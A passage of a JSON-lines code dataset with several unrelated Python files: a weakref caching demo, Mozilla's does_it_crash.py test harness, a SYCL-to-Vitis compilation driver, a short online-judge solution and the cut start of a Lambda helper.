considered \"low level.\" While they are useful for maintaining weak references to\nindividual objects and allowing cycles to be garbage collected. the WeakKeyDictionary and WeakValueDictionary classes\nprovide a more appropriate API for creating a cache of several objects.\n\nThe WeakValueDictionary class uses weak references to the values it holds, allowing them to be garbage collected when\nother code is not actually using them. Using explicit calls to the garbage collector illustrates the difference beween\nmemory handing with a regualr dictionary and WeakValueDictionary.\n\"\"\"\n\nimport gc\nfrom pprint import pprint\nimport weakref\n\n\ngc.set_debug(gc.DEBUG_UNCOLLECTABLE)\n\n\nclass ExpensiveObject(object):\n\n\tdef __init__(self, name):\n\t\tself.name = name\n\n\tdef __repr__(self):\n\t\treturn 'ExpensiveObject({})'.format(self.name)\n\n\tdef __del__(self):\n\t\tprint(' (Deleting {})'.format(self))\n\n\ndef demo(cache_factory):\n\t# hold objects so any weak references\n\t# are not removed immediately\n\tall_refs = {}\n\n\t# create the cache using the factory\n\tprint('CACHE TYPE:', cache_factory)\n\tcache = cache_factory()\n\tfor name in ['one', 'two', 'three']:\n\t\to = ExpensiveObject(name)\n\t\tcache[name] = o\n\t\tall_refs[name] = o\n\t\tdel o\n\n\tprint(' all_refs =', end=' ')\n\tpprint(all_refs)\n\tprint('\\n Before, cache contains:', list(cache.keys()))\n\tfor name, value in cache.items():\n\t\tprint(' {} = {}'.format(name, value))\n\t\tdel value\n\n\t# remove all references to the objects except the cache\n\tprint('\\n Cleanup:')\n\tdel all_refs\n\tgc.collect()\n\n\tprint('\\n After, cache contains:', list(cache.keys()))\n\tfor name, value in cache.items():\n\t\tprint(' {} = {}'.format(name, value))\n\tprint(' demo returning')\n\treturn\n\n\ndemo(dict)\nprint()\ndemo(weakref.WeakValueDictionary)","repo_name":"nixawk/hello-python3","sub_path":"weakref/weakref-caching_objects.py","file_name":"weakref-caching_objects.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"40762956103","text":"#!/usr/bin/env python\n# ***** BEGIN LICENSE BLOCK *****\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n# ***** END LICENSE BLOCK *****\n\"\"\" does_it_crash.py\n\n Runs a thing to see if it crashes within a set period.\n\"\"\"\nimport os\nimport sys\n\nimport requests\n\nsys.path.insert(1, os.path.dirname(sys.path[0]))\n\nimport mozinstall\nfrom mozharness.base.script import BaseScript\nfrom mozprocess import ProcessHandler\n\n\nclass DoesItCrash(BaseScript):\n config_options = [\n [\n [\n \"--thing-url\",\n ],\n {\n \"action\": \"store\",\n \"dest\": \"thing_url\",\n \"type\": str,\n \"help\": \"An URL that points to a package containing the thing to run\",\n },\n ],\n [\n [\n \"--thing-to-run\",\n ],\n {\n \"action\": \"store\",\n \"dest\": \"thing_to_run\",\n \"type\": str,\n \"help\": \"The thing to run. If --thing-url is a package, this should be \"\n \"its location relative to the root of the package.\",\n },\n ],\n [\n [\n \"--thing-arg\",\n ],\n {\n \"action\": \"append\",\n \"dest\": \"thing_args\",\n \"type\": str,\n \"default\": [],\n \"help\": \"Args for the thing. May be passed multiple times\",\n },\n ],\n [\n [\n \"--run-for\",\n ],\n {\n \"action\": \"store\",\n \"dest\": \"run_for\",\n \"default\": 30,\n \"type\": int,\n \"help\": \"How long to run the thing for, in seconds\",\n },\n ],\n ]\n\n def __init__(self):\n super(DoesItCrash, self).__init__(\n all_actions=[\n \"download\",\n \"run-thing\",\n ],\n default_actions=[\n \"download\",\n \"run-thing\",\n ],\n config_options=self.config_options,\n )\n\n def downloadFile(self, url, file_name):\n req = requests.get(url, stream=True, timeout=30)\n file_path = os.path.join(os.getcwd(), file_name)\n\n with open(file_path, \"wb\") as f:\n for chunk in req.iter_content(chunk_size=1024):\n if not chunk:\n continue\n f.write(chunk)\n f.flush()\n return file_path\n\n def download(self):\n url = self.config[\"thing_url\"]\n fn = \"thing.\" + url.split(\".\")[-1]\n self.downloadFile(url=url, file_name=fn)\n if mozinstall.is_installer(fn):\n self.install_dir = mozinstall.install(fn, \"thing\")\n else:\n self.install_dir = \"\"\n\n def run_thing(self):\n thing = os.path.abspath(\n os.path.join(self.install_dir, self.config[\"thing_to_run\"])\n )\n # thing_args is a LockedTuple, which mozprocess doesn't like\n args = list(self.config[\"thing_args\"])\n timeout = self.config[\"run_for\"]\n\n self.log(f\"Running {thing} with args {args}\")\n p = ProcessHandler(\n thing,\n args=args,\n shell=False,\n storeOutput=True,\n kill_on_timeout=True,\n stream=False,\n )\n p.run(timeout)\n # Wait for the timeout + a grace period (to make sure we don't interrupt\n # process tear down).\n # Without this, this script could potentially hang\n p.wait(timeout + 10)\n if not p.timedOut:\n # It crashed, oh no!\n self.critical(\n f\"TEST-UNEXPECTED-FAIL: {thing} did not run for {timeout} seconds\"\n )\n self.critical(\"Output was:\")\n for l in p.output:\n self.critical(l)\n self.fatal(\"fail\")\n else:\n self.info(f\"PASS: {thing} ran successfully for {timeout} seconds\")\n\n\n# __main__ {{{1\nif __name__ == \"__main__\":\n crashit = DoesItCrash()\n crashit.run_and_exit()\n","repo_name":"WaterfoxCo/Waterfox","sub_path":"testing/mozharness/scripts/does_it_crash.py","file_name":"does_it_crash.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":3159,"dataset":"github-code","pt":"34"} +{"seq_id":"38506888073","text":"#!/usr/bin/env python3\n\"\"\"sycl_vxx\nThis is an extra layer of abstraction on top of the shell invoking the\nVitis compiler. As SPIR/LLVM-IR is a second class citizen in Vitis for the\nmoment it has some little niggling details that need worked on and the idea\nis that this script will work around those with some aid from Clang/LLVM.\n\nOne of the main examples is that Vitis can only compile one kernel from LLVM-BC\nat a time and it requires the kernel name (also required for kernel-specific\noptimizations). This poses a problem as there can be multiple kernels in a\nfile. And when making a normal naked v++ -c command in the driver,\nyou won't have the necessary information as the command is generated before\nthe file has have even started to be compiled (perhaps there is, but I am\nunaware of). So, no kernel name and no idea how many Vitis commands you'd need\nto generate per file (no idea how many kernels are in a file).\n\nThis works around that by using an opt (kernelNameGen) pass that generates\nan intermediate file with the needed information that we eat up and can then\nloop over each kernel in a file. It's simple at the moment: just kernel names,\nbut could expand in the future to include optimization information for each\nkernel.\n\"\"\"\n\nfrom argparse import ArgumentParser\nimport functools\nfrom genericpath import exists\nfrom itertools import starmap\nimport functools\nimport json\nimport math\nfrom multiprocessing import Pool\nfrom os import environ\nfrom pathlib import Path\nimport posix_ipc\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\n# This pipeline should be able to do any promotion -O3 is capable of\n# and some more control-flow optimizations than strictly necessary.\n# Some more minimization is probably possible\nOptimizationPipeline = [\n\"-passes=\"\n\"lower-sycl-metadata,\"\n\"preparesycl,\"\n\"loop-unroll,\"\n\"lower-expect,\"\n\"simplifycfg,\"\n\"sroa,\"\n\"early-cse,\"\n\"annotation2metadata,\"\n\"callsite-splitting,\"\n\"ipsccp,\"\n\"called-value-propagation,\"\n\"globalopt,\"\n\"mem2reg,\"\n\"deadargelim,\"\n\"simplifycfg,\"\n\"inline,\"\n\"function-attrs,\"\n\"sroa,\"\n\"early-cse,\"\n\"speculative-execution,\"\n\"jump-threading,\"\n\"correlated-propagation,\"\n\"simplifycfg,\"\n\"libcalls-shrinkwrap,\"\n\"tailcallelim,\"\n\"simplifycfg,\"\n\"reassociate,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"function(loop-mssa(licm)),\"\n\"loop-rotate,\"\n\"function(loop-mssa(licm)),\"\n\"simple-loop-unswitch,\"\n\"simplifycfg,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"indvars,\"\n\"loop-deletion,\"\n\"loop-unroll,\"\n\"sroa,\"\n\"mldst-motion,\"\n\"gvn,\"\n\"sccp,\"\n\"bdce,\"\n\"jump-threading,\"\n\"correlated-propagation,\"\n\"adce,\"\n\"dse,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"simplifycfg,\"\n\"elim-avail-extern,\"\n\"rpo-function-attrs,\"\n\"globalopt,\"\n\"globaldce,\"\n\"float2int,\"\n\"lower-constant-intrinsics,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"loop-rotate,\"\n\"loop-simplify,\"\n\"loop-load-elim,\"\n\"simplifycfg,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"loop-unroll,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"function(loop-mssa(licm)),\"\n\"alignment-from-assumptions,\"\n\"strip-dead-prototypes,\"\n\"globaldce,\"\n\"constmerge,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"loop-sink,\"\n\"instsimplify,\"\n\"div-rem-pairs,\"\n\"simplifycfg,\"\n\"inSPIRation\"\n]\n\nclass TmpDirManager:\n \"\"\" Context handler for a temporary repository that can be programmed\n to be cleaned up when the manager is destroyed.\n \"\"\"\n\n def __init__(self, tmpdir: Path, prefix: str, autodelete: bool):\n self.prefix = prefix\n self.tmpdir = tmpdir\n self.autodelete = autodelete\n if not autodelete:\n print(f\"Temporary clutter in {tmpdir} will not be deleted\")\n\n def __enter__(self) -> Path:\n self.dir = Path(tempfile.mkdtemp(\n dir=self.tmpdir,\n prefix=self.prefix\n ))\n return self.dir\n\n def __exit__(self, *_):\n if (self.autodelete):\n shutil.rmtree(self.dir)\n\n\ndef subprocess_error_handler(msg: str):\n \"\"\" Build decorator that prints an error message and prevents\n CompilationDriver from continuing when a called subprocess\n exits with non-zero status\n \"\"\"\n def decorator(func):\n def decorated(self, *args, **kwargs):\n if self.ok:\n try:\n return func(self, *args, **kwargs)\n except subprocess.CalledProcessError:\n print(msg, file=sys.stderr)\n self.ok = False\n return decorated\n return decorator\n\ndef run_if_ok(func):\n \"\"\" Function only runs if the internal ok state is true\"\"\"\n def decorated(self, *args, **kwargs):\n if self.ok:\n return func(self, *args, **kwargs)\n return decorated\n\n\ndef _run_in_isolated_proctree(cmd, *args, **kwargs):\n \"\"\" Run a command in isolated process namespace.\n This is necessary to get a clean termination of all v++\n subprocesses in case of program interruption, as v++ subprocess\n handling is strange.\n \"\"\"\n newcmd = (\"unshare\",\n \"--map-current-user\",\n \"--pid\",\n \"--mount-proc\",\n \"--kill-child\",\n *cmd)\n return subprocess.run(newcmd, *args, **kwargs)\n\n# choose how many parallel instances of v++ we should have at most\ndef get_exec_count():\n ram_gb = 0\n with open('/proc/meminfo') as file:\n for line in file:\n if 'MemAvailable' in line:\n # KiB to GiB\n ram_gb = int(line.split()[1]) / (1024 * 1024)\n break\n # each instance of vxx uses 5 GiB at most and we keep 10% margin\n max_vxx_instance_count = int(math.trunc(ram_gb * 0.9) / 5)\n if max_vxx_instance_count == 0:\n print(\"warning: v++ is likely to run out of RAM\")\n max_vxx_instance_count = 1\n return max_vxx_instance_count\n\n# In test mode the ressource usage is controlled by a global named semaphore\nis_test_mode = False\nif environ.get(\"SYCL_VXX_TEST_MODE\") is not None:\n is_test_mode = True\n\nclass CSema:\n def __init__(self):\n if is_test_mode:\n # this semaphore is global to every instances of sycl_vxx.py\n self.sema = posix_ipc.Semaphore(\"sycl_vxx.py\", flags= posix_ipc.O_CREAT, initial_value = get_exec_count())\n\n def __enter__(self):\n if is_test_mode:\n self.sema.acquire()\n\n def __exit__(self, a, b, c):\n if is_test_mode:\n self.sema.release()\n self.sema.close()\n\n\n# This is currently unused because a change between version 2021.2 and 2022.1 was later reverted.\n# But it is likely to become useful again in the future, so keep it as is\nclass VXXVersion:\n def __init__(self, exec_path) -> None:\n version_opt = {\"v++\" : \"-v\", \"vitis_hls\" : \"-version\"}\n cmd = (exec_path, version_opt[exec_path.name])\n proc_res = _run_in_isolated_proctree(cmd, capture_output=True)\n version_regex = r\".*v(?P\\d{4})\\.(?P\\d).*\"\n match = re.match(version_regex,\n proc_res.stdout.decode('utf-8'),\n flags=re.DOTALL)\n self.major = int(match['major'])\n self.minor = int(match['minor'])\n print(f\"Found {exec_path.name} version {self}\")\n\n def __str__(self) -> str:\n return f\"{self.major}.{self.minor}\"\n\n def get_correct_opt_args(self):\n options = [\n (\"--sycl-vxx-array-partition-mode-arg\", 2022, 2),\n (\"--sycl-kernel-propgen-maxi-extra-arg\", 2022, 2)\n ]\n def should_add_option(opt_record):\n _, maj, min = opt_record\n return maj < self.major or (maj == self.major and min <= self.minor)\n return (opt for opt, _, _ in filter(should_add_option, options))\n\nclass VXXBinary:\n def __init__(self, execname):\n p = shutil.which(execname)\n if p is None:\n print(f\"error: unable to find {execname}\")\n print(f\"note: make sure you can run {execname} on the command line\\n\")\n raise FileNotFoundError\n self.path = Path(p)\n self.path = self.path.resolve()\n self.version = VXXVersion(self.path)\n if environ.get(\"XILINX_CLANG_39_BUILD_PATH\") is not None:\n self.clang_bin_ = Path(environ[\"XILINX_CLANG_39_BUILD_PATH\"]) / \"bin\"\n else:\n self.clang_bin_ = (\n self.path.parents[2] /\n \"/lnx64/tools/clang-3.9-csynth/bin\"\n ).resolve()\n if not (self.clang_bin_ / \"llvm-as\").is_file():\n self.clang_bin_ = (\n self.path.parents[3] /\n f\"Vitis_HLS/{self.version}\" /\n \"lnx64/tools/clang-3.9-csynth/bin\"\n ).resolve()\n\n @property\n def binary_dir(self):\n return self.path.parent\n\n @property\n def clang_bin(self):\n return self.clang_bin_\n\n\nclass VitisCompilationDriver:\n def __init__(self, arguments, execname):\n self.outpath = Path(arguments.o)\n self.tmp_root = arguments.tmp_root\n self.clang_path = arguments.clang_path.resolve()\n self.inputs = arguments.inputs\n self.vitisexec = VXXBinary(execname)\n self.vitis_bin_dir = self.vitisexec.binary_dir\n self.vitis_version = self.vitisexec.version\n self.outstem = self.outpath.stem\n self.ok = True\n self.vitis_clang_bin = self.vitisexec.clang_bin\n self.cmd_number = 0\n self.dont_execute_vxx = arguments.only_print_vxx_cmds or ('SYCL_VXX_DONT_USE_VXX' in environ)\n\n def _dump_cmd(self, stem, args):\n cmdline = \" \".join(map(str, args))\n with (self.tmpdir / f\"{self.cmd_number:0>3}-{stem}.cmd\").open(\"w\") as f:\n f.write(cmdline + \"\\n\")\n if environ.get(\"SYCL_VXX_DBG_CMD_DUMP\") is not None:\n f.write(f\"\\nOriginal command list: {args}\")\n if environ.get(\"SYCL_VXX_PRINT_CMD\") is not None:\n print(\"SYCL_VXX_CMD:\", cmdline)\n self.cmd_number += 1\n\n def _next_passes(self, inputs):\n return inputs\n\n @subprocess_error_handler(\"Linkage of multiple inputs failed\")\n def _link_multi_inputs(self, inputs):\n \"\"\"Link all input files into a single .bc\"\"\"\n output = self.tmpdir / f\"{self.outstem}-before-opt.bc\"\n if len(inputs) > 1:\n llvm_link = self.clang_path / \"llvm-link\"\n args = [str(llvm_link),\n *inputs,\n \"-o\",\n str(output)\n ]\n self._dump_cmd(\"link_multi_inputs\", args)\n subprocess.run(args, check=True)\n else:\n shutil.copy2(inputs[0], output)\n return output\n\n @subprocess_error_handler(\"Error in sycl->HLS conversion\")\n def _run_preparation(self, inputs):\n \"\"\"Run the various sycl->HLS conversion passes\"\"\"\n # We try to avoid as many optimization as possible\n # to give vitis the opportunity to use its custom\n # optimizations\n outstem = self.outstem\n prepared_bc = (\n self.tmpdir /\n f\"{outstem}-kernels-prepared.ll\"\n )\n opt_options = [\"-S\",\n \"--sroa-vxx-conservative\",\n \"--lower-mem-intr-to-llvm-type\",\n \"--lower-mem-intr-full-unroll\",\n \"--unroll-only-when-forced\",\n ]\n opt_options.extend(OptimizationPipeline)\n opt_options.extend(self.vitis_version.get_correct_opt_args())\n opt_options.extend([\"-o\", f\"{prepared_bc}\"])\n\n opt = self.clang_path / \"opt\"\n args = [opt, *opt_options, inputs]\n self._dump_cmd(\"run_preparation\", args)\n subprocess.run(args, check=True)\n return prepared_bc\n\n @subprocess_error_handler(\"Error when preparing HLS SPIR library\")\n def _run_prepare_lib(self):\n vitis_lib_spir = (\n self.vitis_bin_dir.parent /\n \"lnx64/lib/libspir64-39-hls.bc\"\n ).resolve()\n if not vitis_lib_spir.is_file():\n vitis_lib_spir = (\n self.vitis_bin_dir.parents[2] /\n f\"Vitis_HLS/{self.vitis_version}/lnx64/lib/libspir64-39-hls.bc\"\n ).resolve()\n return vitis_lib_spir\n\n @subprocess_error_handler(\"Error when linking with HLS SPIR library\")\n def _link_spir(self, kernel, lib):\n llvm_link = self.vitis_clang_bin / 'llvm-link'\n linked_kernels = self.tmpdir / f\"{self.outstem}_kernels-linked.xpirbc\"\n args = [\n llvm_link,\n kernel,\n \"--only-needed\",\n lib,\n \"-o\",\n linked_kernels\n ]\n self._dump_cmd(\"link_spir\", args)\n subprocess.run(args, check=True)\n return linked_kernels\n\n @subprocess_error_handler(\"Error in preparing and downgrading IR\")\n def _downgrade(self, inputs):\n opt = self.clang_path / \"opt\"\n prepared_kernels = self.tmpdir / f\"{self.outstem}_linked.simple.ll\"\n kernel_prop = (\n self.tmpdir /\n f\"{self.outstem}-kernels_properties.json\"\n )\n\n opt_options = [\n \"--lower-mem-intr-to-llvm-type\", \"--lower-mem-intr-full-unroll\", \"--lower-delayed-sycl-metadata\",\n \"--sycl-prepare-after-O3\", \"--unroll-only-when-forced\", \"-S\",\n \"-passes=lower-sycl-metadata,globaldce,preparesycl,loop-unroll,kernelPropGen,globaldce\",\n \"-strip-debug\", \"--sycl-kernel-propgen-output\",\n f\"{kernel_prop}\",\n inputs,\n \"-o\", prepared_kernels\n ]\n opt_options.extend(self.vitis_version.get_correct_opt_args())\n args = [opt, *opt_options]\n self._dump_cmd(\"prepare\", args)\n subprocess.run(args, check=True)\n with kernel_prop.open('r') as kp_fp:\n self.kernel_properties = json.load(kp_fp)\n opt_options = [\"-S\", \"-passes=vxxIRDowngrader\"]\n downgraded_ir = (\n self.tmpdir / f\"{self.outstem}_kernels-linked.opt.ll\")\n args = [\n opt, *opt_options, prepared_kernels,\n \"-o\", downgraded_ir\n ]\n self._dump_cmd(\"downgrade\", args)\n subprocess.run(args, check=True)\n return downgraded_ir\n\n @subprocess_error_handler(\"Downgrading of llvm IR -> Vitis old llvm bitcode failed\")\n def _asm_ir(self, inputs):\n \"\"\"Assemble downgraded IR to bitcode using Vitis llvm-as\"\"\"\n vpp_llvm_input = self.tmpdir / f\"{self.outstem}_kernels.opt.xpirbc\"\n args = [\n self.vitis_clang_bin / \"llvm-as\",\n inputs,\n \"-o\",\n vpp_llvm_input\n ]\n self._dump_cmd(\"05-asm_ir.cmd\", args)\n subprocess.run(args, check=True)\n return vpp_llvm_input\n\n def drive_compilation(self):\n autodelete = environ.get(\"SYCL_VXX_KEEP_CLUTTER\") is None\n outstem = self.outstem\n tmp_root = self.tmp_root\n tmp_manager = TmpDirManager(tmp_root, outstem, autodelete)\n with tmp_manager as self.tmpdir:\n joined_kernels = self._link_multi_inputs(self.inputs)\n prepared_bc = self._run_preparation(joined_kernels)\n prepared_lib = self._run_prepare_lib()\n downgraded = self._downgrade(prepared_bc)\n if environ.get(\"SYCL_VXX_MANUAL_EDIT\") is not None:\n print(\"Please edit\", self.downgraded_ir)\n input(\"Press enter to resume the compilation\")\n assembled = self._asm_ir(downgraded)\n spir_linked = self._link_spir(assembled, prepared_lib)\n final = self._next_passes(spir_linked)\n try:\n if not self.dont_execute_vxx:\n shutil.copy2(final, self.outpath)\n except FileNotFoundError:\n print(\n f\"Output {self.xclbin} was not properly produced by previous commands\")\n return self.ok\n\n\nclass VXXCompilationDriver(VitisCompilationDriver):\n def __init__(self, arguments):\n \"\"\"Initializer the compilation driver for VXX mode\"\"\"\n super().__init__(arguments, \"v++\")\n self.vitis_mode = arguments.target\n # TODO: XILINX_PLATFORM should be passed by clang driver instead\n self.xilinx_platform = environ['XILINX_PLATFORM']\n self.extra_comp_args = []\n if arguments.vitis_comp_argfile is not None and exists(arguments.vitis_comp_argfile):\n with arguments.vitis_comp_argfile.open(\"r\") as f:\n content = f.read().strip()\n if content:\n self.extra_comp_args.extend(content.split(' '))\n self.extra_link_args = []\n if arguments.vitis_link_argfile is not None and exists(arguments.vitis_link_argfile):\n with arguments.vitis_link_argfile.open(\"r\") as f:\n content = f.read().strip()\n if content:\n self.extra_link_args.extend(content.split(' '))\n if (self.vitis_mode == \"sw_emu\"):\n raise Exception(\"sw_emu is not compatible with the HLS flow\")\n\n def _get_compile_kernel_cmd_out(self, kernel, inputs):\n \"\"\"Create command to compile kernel\"\"\"\n if self.ok:\n vxx = self.vitis_bin_dir / \"v++\"\n comp_config = environ.get('SYCL_VXX_COMP_CONFIG')\n kernel_output = self.tmpdir / f\"{kernel['name']}.xo\"\n command = [\n vxx, \"--target\", self.vitis_mode,\n \"--advanced.param\", \"compiler.hlsDataflowStrictMode=off\",\n # Do the optimizations that were not performed by the SYCL compiler\n \"-O3\",\n \"--platform\", self.xilinx_platform,\n \"--temp_dir\", self.tmpdir / 'vxx_comp_tmp',\n \"--log_dir\", self.tmpdir / 'vxx_comp_log',\n \"--report_dir\", self.tmpdir / 'vxx_comp_report',\n \"--save-temps\", \"-c\", \"-k\", kernel['name'], '-o', kernel_output,\n inputs\n ]\n if comp_config is not None and Path(comp_config).is_file():\n command.extend((\"--config\", Path(comp_config).resolve()))\n if 'extra_args' in kernel and kernel['extra_args'].strip():\n # User provided kernel arguments can contain many spaces,\n # leading split to give empty string that are incorrectly\n # interpreted as file name by v++ : filter remove them\n command.extend(\n filter(lambda x: x != '', kernel['extra_args'].split(' ')))\n command.extend(self.extra_comp_args)\n self._dump_cmd(f\"vxxcomp-{kernel['name']}\", command)\n return (kernel_output, command)\n\n def _compile_kernel(self, outname, command):\n \"\"\"Execute a kernel compilation command\"\"\"\n if self.ok:\n if not self.dont_execute_vxx:\n with CSema():\n _run_in_isolated_proctree(command, check=True)\n return outname\n\n @subprocess_error_handler(\"Vitis linkage stage failed\")\n def _link_kernels(self, kernels):\n \"\"\"Call v++ to link all kernel in one .xclbin\"\"\"\n xclbin = self.tmpdir / f\"{self.outstem}.xclbin\"\n vpp = self.vitis_bin_dir / \"v++\"\n link_config = environ.get('SYCL_VXX_LINK_CONFIG')\n command = [\n vpp, \"--target\", self.vitis_mode,\n \"--advanced.param\", \"compiler.hlsDataflowStrictMode=off\",\n \"--platform\", self.xilinx_platform,\n \"--temp_dir\", self.tmpdir / 'vxx_link_tmp',\n \"--log_dir\", self.tmpdir / 'vxx_link_log',\n \"--report_dir\", self.tmpdir / 'vxx_link_report',\n \"--save-temps\", \"-l\", \"-o\", xclbin\n ]\n if link_config is not None and Path(link_config).is_file():\n command.extend((\"--config\", Path(link_config).resolve()))\n has_assignment = False\n has_default = False\n for kernelprop in self.kernel_properties['kernels']:\n targets = dict()\n for mem_assign in kernelprop[\"bundle_hw_mapping\"]:\n if mem_assign[\"maxi_bundle_name\"] != \"default\":\n command.extend((\n \"--connectivity.sp\",\n \"{}_1.m_axi_{}:{}\".format(\n kernelprop[\"name\"],\n mem_assign[\"maxi_bundle_name\"],\n mem_assign[\"target_bank\"]\n )\n ))\n targets[mem_assign[\"maxi_bundle_name\"]\n ] = mem_assign[\"target_bank\"]\n for arg_assign in kernelprop[\"arg_bundle_mapping\"]:\n arg_name = arg_assign[\"arg_name\"]\n bundle_name = arg_assign[\"maxi_bundle_name\"]\n if bundle_name == \"default\":\n has_default = True\n else:\n target = targets[bundle_name]\n command.extend((\n \"--connectivity.sp\",\n \"{}_1.{}:{}\".format(\n kernelprop[\"name\"],\n arg_name,\n target\n )\n ))\n has_assignment = True\n if has_assignment and has_default:\n raise NotImplementedError(\n \"Mix between assigned an non assigned bank is not supported yet\")\n\n # The pipe plumbing is actually done by Vitis with the right options\n for pipe in self.kernel_properties['pipe_connections']:\n command.extend((\"--connectivity.sc\", \"{}_1.{}:{}_1.{}:{}\".format(\n pipe[\"writer_kernel\"], pipe[\"writer_arg\"], pipe[\"reader_kernel\"], pipe[\"reader_arg\"], pipe[\"depth\"])))\n\n command.extend(self.extra_link_args)\n command.extend(kernels)\n self._dump_cmd(\"vxxlink\", command)\n if not self.dont_execute_vxx:\n with CSema():\n _run_in_isolated_proctree(command, check=True)\n return xclbin\n\n @subprocess_error_handler(\"Vitis compilation stage failed\")\n def _launch_parallel_compilation(self, inputs):\n # Compilation commands are generated in main process to ensure\n # they are printed on main process stdout if command dump is set\n compile_commands = map(\n functools.partial(self._get_compile_kernel_cmd_out, inputs=inputs),\n self.kernel_properties[\"kernels\"])\n if environ.get(\"SYCL_VXX_SERIALIZE_VITIS_COMP\") is None:\n p = Pool()\n try:\n future = p.starmap_async(\n self._compile_kernel,\n compile_commands)\n return list(future.get())\n except KeyboardInterrupt:\n p.terminate()\n raise KeyboardInterrupt\n else:\n return list(starmap(self._compile_kernel, compile_commands))\n\n def _next_passes(self, inputs):\n # Driver specific area\n kernels = self._launch_parallel_compilation(inputs)\n xclbin = self._link_kernels(kernels)\n return xclbin\n\nclass IPExportCompilationDriver(VitisCompilationDriver):\n def __init__(self, arguments):\n \"\"\"Initializer the compilation driver for vitis_hls mode\"\"\"\n super().__init__(arguments, \"vitis_hls\")\n self.target = arguments.target\n self.clock_period = arguments.clock_period\n\n @run_if_ok\n def _get_top_comp_name(self):\n numKernels = len(self.kernel_properties[\"kernels\"])\n if numKernels != 1:\n raise Exception(\n f\"{numKernels} top level components found, should be exactly one\")\n kernelname = self.kernel_properties[\"kernels\"][0]['name']\n return kernelname\n\n @run_if_ok\n def _create_hls_script(self, compname, inputs):\n script = self.tmpdir / \"run_hls.tcl\"\n out = self.tmpdir / f\"{compname}.zip\"\n with script.open(\"w\") as sf:\n sf.writelines(map(lambda x : f\"{x}\\n\", [\n \"open_project -reset proj\",\n f\"add_files {inputs}\",\n f\"set_top {compname}\",\n \"open_solution -reset sol\",\n f\"set_part {self.target}\",\n f\"create_clock -period {self.clock_period} -name default\",\n \"config_dataflow -strict_mode off\",\n \"csynth_design\",\n f\"export_design -flow impl -format ip_catalog -output {out}\",\n \"exit\",\n ]))\n return script, out\n\n @subprocess_error_handler(\"Vitis HLS invocation failed\")\n def _run_vitis_hls(self, script):\n cmd = (self.vitisexec.path, \"-f\", script)\n self._dump_cmd(\"vitis-hls-invocation\", cmd)\n _run_in_isolated_proctree(cmd, check=True, cwd=self.tmpdir)\n\n def _next_passes(self, inputs):\n topcompname = self._get_top_comp_name()\n script, final_comp = self._create_hls_script(topcompname, inputs)\n self._run_vitis_hls(script)\n return final_comp\n\n\ndef parse_args(args=sys.argv[1:]):\n description=\"Utility to drive various compilation flow for vivado related tools\"\n toplevel_parser = ArgumentParser(description=description, add_help=False, prefix_chars=\"@\")\n toplevel_parser.add_argument(\"command\", choices=(\"vxxcompile\", \"ipexport\", \"help\"), help=\"Command to launch\")\n toplevel_parser.add_argument(\"args\", nargs=\"*\", help=\"Command arguments\")\n toplevel = toplevel_parser.parse_args(args=args)\n command = toplevel.command\n if command == \"help\":\n toplevel_parser.print_help()\n toplevel_parser.exit()\n parser = ArgumentParser(description=description)\n if command == \"vxxcompile\":\n parser.add_argument(\n \"--hls\",\n help=\"Activate the HLS flow instead of the default SPIR one\",\n action=\"store_true\")\n parser.add_argument(\n \"--target\",\n help=\"v++ synthesis mode\",\n choices=[\"sw_emu\", \"hw_emu\", \"hw\"],\n required=True)\n parser.add_argument(\n \"--vitis_comp_argfile\",\n help=\"file containing v++ -c argument\",\n type=Path)\n parser.add_argument(\n \"--vitis_link_argfile\",\n help=\"file containing v++ -l argument\",\n type=Path)\n # There should not be other cases\n elif command == \"ipexport\":\n parser.add_argument(\n \"--target\",\n help=\"Part code for which the synthesis should be done\",\n required=True)\n # TODO delay the default to clang driver, make it required here\n parser.add_argument(\n \"--clock-period\",\n help=\"clock period description\",\n default=\"3ns\"\n )\n\n parser.add_argument(\n \"--clang_path\",\n help=\"path to the clang driver that's executing the script\",\n required=True,\n type=Path)\n parser.add_argument(\n \"--tmp_root\",\n help=\"The temporary directory where we'll put some intermediate files\",\n required=True,\n type=Path)\n parser.add_argument(\n \"-only_print_vxx_cmds\",\n help=\"Print comands instead of executing them\",\n required=False,\n type=bool)\n\n parser.add_argument(\"-o\", help=\"output file name\", required=True, type=Path)\n parser.add_argument(\"inputs\", nargs=\"+\")\n return command, parser.parse_args(args=toplevel.args)\n\n\ndef main():\n \"\"\"Script entry function\"\"\"\n command, args = parse_args()\n if command == \"vxxcompile\":\n cd = VXXCompilationDriver(args)\n else:\n cd = IPExportCompilationDriver(args)\n return cd.drive_compilation()\n\n\nif __name__ == \"__main__\":\n import sys\n try:\n if (not main()):\n sys.exit(-1)\n except KeyboardInterrupt:\n print(\"Received keyboard interrupt, will stop\")\n sys.exit(-2)\n","repo_name":"AlexanderPuckhaber/sycl","sub_path":"sycl/tools/sycl-vxx/bin/sycl_vxx.py","file_name":"sycl_vxx.py","file_ext":"py","file_size_in_byte":27547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"20301304366","text":"input_size = int(input())\nfor input_line in range(input_size):\n input_A, input_B = map(int, input().split())\n if input_A == input_B:\n print(0)\n continue\n elif input_A < input_B:\n number_min = input_A + 1 + input_A % 2\n number_max = input_B - 1 - input_B % 2\n else:\n number_max = input_A - 1 - input_A % 2\n number_min = input_B + 1 + input_B % 2\n print('{}'.format((number_max - number_min + 2) * (number_min + number_max) // 4))","repo_name":"dankoga/URIOnlineJudge--Python-3.9","sub_path":"URI_1099.py","file_name":"URI_1099.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3521337219","text":"from idea_lambda_commons import HttpClient, CfnResponse, CfnResponseStatus\n\nimport json\nimport datetime\nimport os\nimport logging\n\nlogger = 